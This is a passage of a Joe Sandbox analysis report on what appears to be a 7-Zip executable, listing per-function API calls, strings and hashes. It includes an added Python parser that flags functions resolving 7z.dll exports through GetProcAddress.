                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$fputs$ExceptionThrowfputc
                                • String ID: Errors: $Warnings:
                                • API String ID: 437615013-2345102087
                                • Opcode ID: c3d0abce408dde42c17494abdae3fdcf64b4e9ff092c9feb317e4479279828f3
                                • Instruction ID: d2619c8fc8aa3dd064bfee33bdddf7396604d9b0ef05558c260312edd0ac4d04
                                • Opcode Fuzzy Hash: c3d0abce408dde42c17494abdae3fdcf64b4e9ff092c9feb317e4479279828f3
                                • Instruction Fuzzy Hash: B751D762344AC542DB30FB32E5903AE6360F781B98F444127DE5D57B59DF2CC8A68B0A

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 449944-44997a]
                                APIs
                                • free.MSVCRT ref: 0044999F
                                • free.MSVCRT ref: 004499D5
                                • free.MSVCRT ref: 004499DD
                                • free.MSVCRT ref: 004499E5
                                • free.MSVCRT ref: 00449B16
                                • free.MSVCRT ref: 00449B21
                                • free.MSVCRT ref: 00449BDB
                                • memmove.MSVCRT(?), ref: 00449C11
                                • free.MSVCRT ref: 00449CC6
                                • free.MSVCRT ref: 00449DEC
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417B7
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417BF
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417CC
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417F8
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441801
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441809
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441816
                                • free.MSVCRT ref: 00449D18
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • free.MSVCRT ref: 00449D50
                                • GetProcAddress.KERNEL32 ref: 00449DA6
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove$AddressProc
                                • String ID: 7z.dll$Codecs$Formats$SetCodecs
                                • API String ID: 4053071709-3422688593
                                • Opcode ID: b428be2be7e56feabc1b879de8a2f9b52c1dd976b4b26d83b5dfddc809408503
                                • Instruction ID: 37faa1f67efab7f2ae99932dab60bb640fb14db8c43a0ec9d78bad94febb0c92
                                • Opcode Fuzzy Hash: b428be2be7e56feabc1b879de8a2f9b52c1dd976b4b26d83b5dfddc809408503
                                • Instruction Fuzzy Hash: 2DC19076604A8596EB20EF26E5803AFB760F384788F544117DB8E47B25DF7CC8A9D708

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 43c0c8-43c157]
                                APIs
                                  • Part of subcall function 0043BF1C: free.MSVCRT ref: 0043BFDB
                                • memmove.MSVCRT ref: 0043C14F
                                • free.MSVCRT ref: 0043C166
                                • free.MSVCRT ref: 0043C207
                                • _CxxThrowException.MSVCRT ref: 0043C250
                                • free.MSVCRT ref: 0043C2D9
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C057
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C072
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C07B
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C0A6
                                  • Part of subcall function 0043C044: free.MSVCRT ref: 0043C0AE
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowmemmove
                                • String ID: Cannot find archive$Duplicate archive path:
                                • API String ID: 3934437811-2067063536
                                • Opcode ID: 1b9646bc435d3208f139c2aac129064c73059193869c0b617ab2b1beba7b5aff
                                • Instruction ID: 00197024828f8eee69ea0c5ed2d62de36f9646e59d304e5f90616deed721387f
                                • Opcode Fuzzy Hash: 1b9646bc435d3208f139c2aac129064c73059193869c0b617ab2b1beba7b5aff
                                • Instruction Fuzzy Hash: C4B1B572715A8482CB20EB26E49019EB361F789BD4F445617EE9E57B18DF3CC852CB08

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 4470ac-447101]
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID: 7z.dll$Codecs$Formats$Path$Path64
                                • API String ID: 1534225298-3804457719
                                • Opcode ID: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                                • Instruction ID: 73f7aad5d9e7af525343a5eae5b693efbebf73e0a6d9294321ebebffba137396
                                • Opcode Fuzzy Hash: 0ee43319ccbabe998e43829a73327be4aef6bcdc6f0d81ad496a92ee476f1eae
                                • Instruction Fuzzy Hash: D951846224860951DA20EF26E4513AE6721D7C1BE8F841217BE9E577B9CF6CC98BC708

                                 Control-flow Graph
                                 [rendered graph omitted; edge list not reproduced. First basic block: 460fe8-46101e]
                                APIs
                                • EnterCriticalSection.KERNEL32 ref: 0046100F
                                • fputs.MSVCRT ref: 004610A2
                                • LeaveCriticalSection.KERNEL32 ref: 004611DF
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                • fputs.MSVCRT ref: 004610E5
                                  • Part of subcall function 0041263C: fputs.MSVCRT ref: 0041265D
                                • fputs.MSVCRT ref: 00461166
                                • fputs.MSVCRT ref: 00461185
                                • LeaveCriticalSection.KERNEL32 ref: 004611EC
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • free.MSVCRT ref: 004611AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$CriticalSection$Leave$Enterfputcfreememset
                                • String ID: Can't allocate required memory!$ERROR: $Everything is Ok$Sub items Errors: $p
                                • API String ID: 676172275-580504279
                                • Opcode ID: d67db602faefb942015f063706c8f37e49b44373b54a083d9a794ddac30406b5
                                • Instruction ID: a704836268c8c7c681b75e0ddbc988372986ae625731cd79a6a7160b5d8bd6fd
                                • Opcode Fuzzy Hash: d67db602faefb942015f063706c8f37e49b44373b54a083d9a794ddac30406b5
                                • Instruction Fuzzy Hash: 3C5150B2305A81A2DF19DB26DA903E96320F74AB94F084227DB1E47761DF7CD4B5C30A

                                 Control-flow Graph (rendered interactively in the report; legend: Executed / Not Executed)
                                 Basic blocks span 0x41e07c to 0x41e5aa. Calls made from inside the graph: free, 412db8, 41354c, 41be6c, 41bf00, 412f28, 455a44, 412350, 412e34, 41d894, 41d93c, 41da48.
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ClearVariant
                                • String ID:
                                • API String ID: 1677346816-0
                                • Opcode ID: b2011a61e1b9e46066989be7237a598fc2fe20666997cd285cbefd50ad59e57e
                                • Instruction ID: b355e39b3f884915bfde1ca07b60af7eb4fbd987566637bb8d115ec8e7860991
                                • Opcode Fuzzy Hash: b2011a61e1b9e46066989be7237a598fc2fe20666997cd285cbefd50ad59e57e
                                • Instruction Fuzzy Hash: 89C18F36704A5492CA20EF26E4801EEA760F789B44F940127EF5E97B25DF3DC9D6CB48

                                 Control-flow Graph (rendered interactively in the report; legend: Executed / Not Executed)
                                 Basic blocks span 0x453309 to 0x453b8c. Calls made from inside the graph: 43c944, memmove, 413798, 452710, 44b3b4, 455a44, 412350, 44b8e4, 43ca94, free, 44aec4, 452a28.
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$memmove
                                • String ID:
                                • API String ID: 1534225298-3916222277
                                • Opcode ID: 8b4caeb950cbe161e56d81e3966d8e5f9c712ebcee9e431d21324a34651fa949
                                • Instruction ID: bf9948aa654561e064c9a21051a3bb2d4dcd656f0e5d6e22b548d65e36601986
                                • Opcode Fuzzy Hash: 8b4caeb950cbe161e56d81e3966d8e5f9c712ebcee9e431d21324a34651fa949
                                • Instruction Fuzzy Hash: 7DD14D73209BC496CB21DF26E09029EBB60F385B89F444116DB8E47B66DF7CC999CB05
                                APIs
                                • GetProcAddress.KERNEL32 ref: 00449543
                                • GetProcAddress.KERNEL32 ref: 00449564
                                • GetProcAddress.KERNEL32 ref: 00449587
                                • free.MSVCRT ref: 00449644
                                • GetLastError.KERNEL32 ref: 00449411
                                  • Part of subcall function 00416B80: FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
                                  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
                                  • Part of subcall function 00455A44: memmove.MSVCRT ref: 00455AAD
                                  • Part of subcall function 00455A44: free.MSVCRT ref: 00455AB5
                                  • Part of subcall function 00412350: malloc.MSVCRT ref: 00412360
                                  • Part of subcall function 00412350: _CxxThrowException.MSVCRT ref: 0041237B
                                • free.MSVCRT ref: 00449655
                                Strings
                                • CreateObject, xrefs: 0044957C
                                • the module is not compatible with program, xrefs: 00449511
                                • cannot load file as datafile library, xrefs: 0044943B
                                • SetCaseSensitive, xrefs: 00449559
                                • SetLargePageMode, xrefs: 00449538
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProcfree$ExceptionThrow$ErrorFreeLastLibrarymallocmemmove
                                • String ID: CreateObject$SetCaseSensitive$SetLargePageMode$cannot load file as datafile library$the module is not compatible with program
                                • API String ID: 3132779546-1792956296
                                • Opcode ID: feee42203aa24b2703ff37248d8e6ac729fd08cae7b6304639fd7328bd49b841
                                • Instruction ID: a402d0bb35d2d128c3b756a7b42d5c670692195a8dd2cbfa0be959ad7ad6ea2b
                                • Opcode Fuzzy Hash: feee42203aa24b2703ff37248d8e6ac729fd08cae7b6304639fd7328bd49b841
                                • Instruction Fuzzy Hash: 6061E072301B40A6EF14EF26D5543AE23A0FB85B98F44452A9F5E87791EF3CD8A5D308
                                APIs
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 004488E1
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 004488F6
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 0044890B
                                • GetProcAddress.KERNEL32 ref: 00448936
                                • memmove.MSVCRT ref: 00448A59
                                • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,FFFFFFFF,00000000), ref: 00448A8C
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AddressProc$memmove
                                • String ID: CreateDecoder$CreateEncoder$GetHashers$GetMethodProperty$GetNumberOfMethods
                                • API String ID: 2879976980-73314117
                                • Opcode ID: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                                • Instruction ID: acda87329fe04fcecd5dd4acd5e6a2ea2bd90247aedeb650fb44bfd6cb0ca977
                                • Opcode Fuzzy Hash: ea001d529e21fa486ba1d8765e8fb72d218ee3b8b902cfa8c72413175b78bef0
                                • Instruction Fuzzy Hash: A5516E72618A80CAD721DF14E8847AEB761F384794F51021BEA8E47B68DFBCC985C748
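The two records above are the part of this image that resolves exports by name at run time: three and five GetProcAddress calls each, with the looked-up names sitting in the same function as plain strings (CreateObject, SetCaseSensitive, SetLargePageMode, CreateDecoder, CreateEncoder, GetHashers, GetMethodProperty, GetNumberOfMethods). Those names are the exported entry points of 7-Zip's 7z.dll, which fits the "7z" label on the snapshot file, but the report itself does not say so, and that attribution is an inference. When working through a report of this size, it helps to pull exactly this evidence out of the text automatically. The following parser is an added example written for this page; it is not part of the Joe Sandbox report or of the analysed sample. It reads function records in the layout this section uses (APIs / Strings / Similarity), separates direct calls from "Part of subcall function" entries, and flags every function that calls GetProcAddress together with the identifier-like strings it carries. The sample input is constructed from the records above, and the 7z.dll export list is an assumption supplied by the example.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: two function records in the text layout this
# report section uses (copied from the records above, trimmed to the
# APIs / Strings / Similarity parts the parser needs).
SAMPLE = """\
APIs
• GetProcAddress.KERNEL32 ref: 00449543
• GetProcAddress.KERNEL32 ref: 00449564
• GetProcAddress.KERNEL32 ref: 00449587
• free.MSVCRT ref: 00449644
• GetLastError.KERNEL32 ref: 00449411
  • Part of subcall function 00416B80: FreeLibrary.KERNELBASE(?,?,?,00416C03), ref: 00416B91
  • Part of subcall function 00455A44: _CxxThrowException.MSVCRT ref: 00455A74
• free.MSVCRT ref: 00449655
Strings
• CreateObject, xrefs: 0044957C
• the module is not compatible with program, xrefs: 00449511
• cannot load file as datafile library, xrefs: 0044943B
• SetCaseSensitive, xrefs: 00449559
• SetLargePageMode, xrefs: 00449538
Similarity
• API ID: AddressProcfree$ExceptionThrow$ErrorFreeLastLibrarymallocmemmove
• Opcode ID: feee42203aa24b2703ff37248d8e6ac729fd08cae7b6304639fd7328bd49b841
APIs
• fputs.MSVCRT ref: 00462C2D
• free.MSVCRT ref: 00462C65
Strings
Similarity
• API ID: free$fputs
• Opcode ID: 6af2d0b8ce2b096ca53b8f6896709cd8d10ae8ae6da6be3d4fe635be2d879f48
"""

# Assumption: the exported entry points of 7-Zip's 7z.dll. The report only
# labels the dump "7z"; this list is supplied by the example, not the page.
SEVEN_ZIP_DLL_EXPORTS = {
    "CreateObject", "CreateDecoder", "CreateEncoder", "GetHashers",
    "GetMethodProperty", "GetNumberOfMethods", "GetNumberOfFormats",
    "GetHandlerProperty", "GetHandlerProperty2",
    "SetLargePageMode", "SetCaseSensitive",
}

BULLET = r"^[•*-]?\s*"
CALL = r"(?P<api>\w+)\.(?P<mod>\w+)(?:\([^)]*\))?,?\s*ref:\s*(?P<addr>[0-9A-Fa-f]+)$"
API_RE = re.compile(BULLET + CALL)
SUBCALL_RE = re.compile(BULLET + r"Part of subcall function (?P<fn>[0-9A-Fa-f]+):\s*" + CALL)
XREF_RE = re.compile(BULLET + r"(?P<s>.+?),\s*xrefs:\s*(?P<addr>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(BULLET + r"(?P<key>API ID|String ID|API String ID|Opcode ID|"
                      r"Instruction ID|Opcode Fuzzy Hash|Instruction Fuzzy Hash):\s*(?P<val>.*)$")
IDENT_RE = re.compile(r"^[A-Za-z_]\w*$")  # a string that looks like an export name
SECTION_HEADERS = {"Strings", "Similarity", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Control-flow Graph"}


@dataclass
class FunctionRecord:
    direct_apis: list = field(default_factory=list)   # (api, module, call site)
    subcall_apis: list = field(default_factory=list)  # (callee, api, module, call site)
    strings: list = field(default_factory=list)       # (text, xref)
    fields: dict = field(default_factory=dict)        # Similarity block key/values


def parse_records(text):
    """Split report text into FunctionRecords; a record starts at each 'APIs' line."""
    records, current, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
            continue
        if line in SECTION_HEADERS:
            section = line.lower()
            continue
        if current is None:
            continue
        if section == "apis":
            m = SUBCALL_RE.match(line)
            if m:
                current.subcall_apis.append((m["fn"], m["api"], m["mod"], m["addr"]))
                continue
            m = API_RE.match(line)
            if m:
                current.direct_apis.append((m["api"], m["mod"], m["addr"]))
        elif section == "strings":
            m = XREF_RE.match(line)
            if m:
                current.strings.append((m["s"], m["addr"]))
        elif section == "similarity":
            m = FIELD_RE.match(line)
            if m:
                current.fields[m["key"]] = m["val"].strip()
    return records


def resolved_exports(rec):
    """Identifier-like strings in a function that itself calls GetProcAddress:
    the names it resolves at run time instead of importing statically."""
    if not any(api == "GetProcAddress" for api, _, _ in rec.direct_apis):
        return []
    return sorted(s for s, _ in rec.strings if IDENT_RE.match(s))


def triage(text):
    """Summarise every record that resolves exports dynamically."""
    hits = []
    for rec in parse_records(text):
        names = resolved_exports(rec)
        if names:
            hits.append({
                "opcode_id": rec.fields.get("Opcode ID"),
                "getprocaddress_sites": [a for api, _, a in rec.direct_apis if api == "GetProcAddress"],
                "exports": names,
                "known_7z_exports": sorted(set(names) & SEVEN_ZIP_DLL_EXPORTS),
            })
    return hits


if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
```

Feeding the whole section through `triage` leaves only the two GetProcAddress records; everything else (the fputs/free reporting helpers, the CRT startup stubs) drops out, and the `known_7z_exports` field shows at a glance that the resolved names are the host's own codec-DLL interface rather than, say, networking or injection APIs. Names that are not in the assumed export list are the ones worth a manual look.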
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowfputcfputs
                                • String ID: Decoding ERROR
                                • API String ID: 169956451-2585761706
                                • Opcode ID: a59dee74f476df6a6aad30d7778586064c72fb2b935b142bad887d2b23d84382
                                • Instruction ID: 88840ca7e5b7c7e55b2c6b20af2c1d2bdb38f3b48ba068b74612796d88fb55af
                                • Opcode Fuzzy Hash: a59dee74f476df6a6aad30d7778586064c72fb2b935b142bad887d2b23d84382
                                • Instruction Fuzzy Hash: A131E762755AC982DB30EB22F9903AE6310F780B98F444127CE5D57768EF7CC956CB0A
                                APIs
                                • fputs.MSVCRT ref: 0046149D
                                  • Part of subcall function 0046B4D0: memset.MSVCRT ref: 0046B515
                                  • Part of subcall function 0046B4D0: fputs.MSVCRT ref: 0046B53A
                                  • Part of subcall function 004124C4: fputc.MSVCRT ref: 004124D5
                                • fputs.MSVCRT ref: 004615A4
                                • fputs.MSVCRT ref: 004616C0
                                • fputs.MSVCRT ref: 00461715
                                  • Part of subcall function 00460EB4: fputs.MSVCRT ref: 00460EDC
                                  • Part of subcall function 00460EB4: fputs.MSVCRT ref: 00460EF0
                                  • Part of subcall function 00460EB4: free.MSVCRT ref: 00460F03
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • free.MSVCRT ref: 0046173F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputs$free$fputcmemset
                                • String ID: Can't allocate required memory$ERROR: $ERRORS:$WARNINGS:
                                • API String ID: 738794847-24972044
                                • Opcode ID: a3ad9c4225bfd94baf50ffd7a6141bf49be2fef2ca62c158f2191260a135c682
                                • Instruction ID: 6dd9e00e4d03b6aa393d9a6abb5311f2bf989c7ce13ad79f35b0012463e95f84
                                • Opcode Fuzzy Hash: a3ad9c4225bfd94baf50ffd7a6141bf49be2fef2ca62c158f2191260a135c682
                                • Instruction Fuzzy Hash: 1DA15D76700AC5A6CA29EF26D6903EE7321F384784F48411BDB5E47761EF6CD8B4831A
                                APIs
                                • free.MSVCRT ref: 00467CE5
                                • free.MSVCRT ref: 00467CEE
                                • free.MSVCRT ref: 00467D21
                                • free.MSVCRT ref: 00467D2E
                                • free.MSVCRT ref: 00467D5A
                                • free.MSVCRT ref: 00467D62
                                • free.MSVCRT ref: 00467D6A
                                • free.MSVCRT ref: 00467D77
                                • free.MSVCRT ref: 00467D80
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417B7
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417BF
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417CC
                                  • Part of subcall function 00441784: free.MSVCRT ref: 004417F8
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441801
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441809
                                  • Part of subcall function 00441784: free.MSVCRT ref: 00441816
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free
                                • String ID: $|F
                                • API String ID: 1294909896-3694191985
                                • Opcode ID: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                                • Instruction ID: bb7aa02378a273fc65e0630a3d9172c6d6c88182e3016dc353753ff525c7fea3
                                • Opcode Fuzzy Hash: a2d9f6ed36859aef40b0543bcc9ffb590241e82db697b8cfc55c95f9d211cc78
                                • Instruction Fuzzy Hash: FB119333745A4886DB11FF36E9512AD6321EB80F9CB58062B9E2D5B355EF6CCC938348
                                APIs
                                • strcmp.MSVCRT ref: 0046B9EA
                                • fputs.MSVCRT ref: 0046BA0B
                                • GetTickCount.KERNEL32 ref: 0046B794
                                  • Part of subcall function 00413798: free.MSVCRT ref: 004137C4
                                  • Part of subcall function 00413798: memmove.MSVCRT ref: 004137DF
                                  • Part of subcall function 00413C68: memmove.MSVCRT(0041B159), ref: 00413CA7
                                  • Part of subcall function 00413EC0: memmove.MSVCRT ref: 00413F06
                                • strcmp.MSVCRT ref: 0046B7DA
                                • wcscmp.MSVCRT ref: 0046B7FA
                                • strcmp.MSVCRT ref: 0046B862
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: memmovestrcmp$CountTickfputsfreewcscmp
                                • String ID: . $[Content]
                                • API String ID: 591578422-2304726976
                                • Opcode ID: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                                • Instruction ID: b9e93193eb65d0c201aa753bb249c39f6188072250678c1399066b31000ebe39
                                • Opcode Fuzzy Hash: 9094ce9056a28d657d41618d04ec6bfd7be09a4c8be3546634b690409dc7b727
                                • Instruction Fuzzy Hash: 06811673700A45A7CA18EB2AC68029D7365F744788F405117DB5987B20EF78E9FAC789
                                APIs
                                • fputs.MSVCRT ref: 00462C2D
                                • fputs.MSVCRT ref: 00462C4C
                                • free.MSVCRT ref: 00462C65
                                • free.MSVCRT ref: 00462C70
                                  • Part of subcall function 00412E68: free.MSVCRT ref: 00412EA0
                                  • Part of subcall function 00412790: fputs.MSVCRT ref: 004127D9
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127E5
                                  • Part of subcall function 00412790: free.MSVCRT ref: 004127F0
                                • free.MSVCRT ref: 00462C7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                 • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmp
                                 • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmp
                                Joe Sandbox IDA Plugin
